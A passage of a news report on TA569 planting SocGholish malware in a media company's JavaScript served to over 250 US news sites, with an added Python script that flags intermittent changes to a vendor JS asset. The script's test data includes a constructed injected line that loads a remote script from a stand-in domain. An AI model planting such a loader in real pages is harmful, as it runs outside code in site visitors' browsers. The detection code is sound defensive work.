“The media company in question is a company that provides both video content and advertising to major news outlets. [It] serves many different companies in different markets across the United States,” Sherrod DeGrippo, vice president of threat research and detection at Proofpoint, told BleepingComputer.
“By changing the codebase of this otherwise benign JS, it is now used to deploy SocGholish.”
In total, the malware was installed on the websites of more than 250 US news outlets, some of them major news organizations, according to researchers at enterprise security firm Proofpoint.
While the total number of affected news organizations is currently unknown, Proofpoint says it is aware of affected media organizations (including national news outlets) from New York, Boston, Chicago, Miami, Washington, DC, and others.
We track this actor as #TA569. TA569 has a history of taking turns removing and restoring these malicious JS injections. Therefore, the presence of the payload and malicious content can vary from hour to hour and should not be considered a false positive.
— Threat Insight (@threatinsight) November 2, 2022
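The tweet above makes a point that matters for anyone who embeds a vendor's JavaScript: the injection is toggled on and off, so a single clean fetch of the asset says nothing about whether it was modified an hour earlier. The script below is an added example, not code from the article, from Proofpoint or from the affected media company. It hashes successive snapshots of one JS asset against a known-good baseline and reports what was added whenever the hash deviates. The snapshots, the baseline, the `.invalid` domain in the constructed injected line, and the function names `audit_snapshots` and `ever_modified` are all this example's own assumptions; a real deployment would replace the in-memory snapshots with periodic fetches of the vendor URL.

```python
"""Track a third-party JavaScript asset across repeated fetches and flag
deviations from a known-good baseline.

Added example, not code from the original article or from Proofpoint.
Fetching is stubbed: the snapshots below are constructed to imitate an
asset that is clean, then modified, then restored, which is the on/off
pattern the article describes.  All names and data here are assumptions.
"""
import difflib
import hashlib

# Constructed known-good copy of the vendor script.
BASELINE_JS = "function loadPlayer(){console.log('player ready');}\n"

# Constructed snapshots of the same URL taken an hour apart.  The middle
# one carries an extra script-loader line pointing at a non-existent
# .invalid domain; nothing here is a real indicator.
INJECTED_LINE = (
    "(function(){var s=document.createElement('script');"
    "s.src='//cdn.example.invalid/u.js';document.head.appendChild(s);})();\n"
)
SNAPSHOTS = [
    ("2022-11-02T10:00", BASELINE_JS),
    ("2022-11-02T11:00", BASELINE_JS + INJECTED_LINE),
    ("2022-11-02T12:00", BASELINE_JS),
]


def sha256(text: str) -> str:
    """Hex SHA-256 of the asset body; the comparison key for each snapshot."""
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def audit_snapshots(baseline: str, snapshots):
    """Compare each (timestamp, body) snapshot with the baseline.

    Returns a list of (timestamp, verdict, added_lines).  verdict is
    'clean' when the hash matches the baseline and 'modified' otherwise;
    added_lines are the lines present in the snapshot but not in the
    baseline, so an analyst sees what was injected rather than just that
    something changed.
    """
    base_hash = sha256(baseline)
    base_lines = baseline.splitlines()
    results = []
    for ts, body in snapshots:
        if sha256(body) == base_hash:
            results.append((ts, "clean", []))
            continue
        diff = difflib.unified_diff(base_lines, body.splitlines(), lineterm="", n=0)
        added = [l[1:] for l in diff if l.startswith("+") and not l.startswith("+++")]
        results.append((ts, "modified", added))
    return results


def ever_modified(results) -> bool:
    """True if any snapshot deviated, even when the latest one is clean.

    This is the check that turns an intermittent injection into a finding
    instead of a dismissed false positive.
    """
    return any(verdict == "modified" for _, verdict, _ in results)


if __name__ == "__main__":
    res = audit_snapshots(BASELINE_JS, SNAPSHOTS)
    for ts, verdict, added in res:
        print(ts, verdict)
        for line in added:
            print("   +", line)
    print("asset ever modified:", ever_modified(res))
```

Keep the history of verdicts, not just the latest one: with the constructed data the last fetch is clean, yet `ever_modified` still returns true because the 11:00 snapshot carried an extra loader line. For a real monitor, pin the baseline to a reviewed copy of the vendor script and treat any deviation as a change to investigate rather than re-baselining automatically.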
“TA569 has previously used media resources to spread SocGholish, and this malware can lead to secondary infections, including potential ransomware,” DeGrippo also told BleepingComputer.
“The situation needs to be closely monitored as Proofpoint has observed TA569 re-infecting the same assets just days after remediation.”
Link to ransomware attacks
Proofpoint has previously observed SocGholish campaigns that used fake updates and website redirects to infect users, including in some cases ransomware payloads.
Cybercrime gang Evil Corp also used SocGholish in a very similar campaign to infect the employees of more than 30 large US private companies via fake software update alerts sent through dozens of compromised US newspaper websites.
The infected computers were later used as a springboard into employers’ corporate networks in attacks attempting to deploy the gang’s WastedLocker ransomware.
Fortunately, Symantec revealed in a report that it blocked Evil Corp’s attempts to encrypt the breached networks in attacks targeting several private companies, including 30 US companies, eight of them Fortune 500 companies.
SocGholish was also recently used to backdoor networks already infected with the Raspberry Robin malware, in what Microsoft described as Evil Corp pre-ransomware behavior.
Update Nov. 2 6:22 p.m. EDT: Added Proofpoint statement.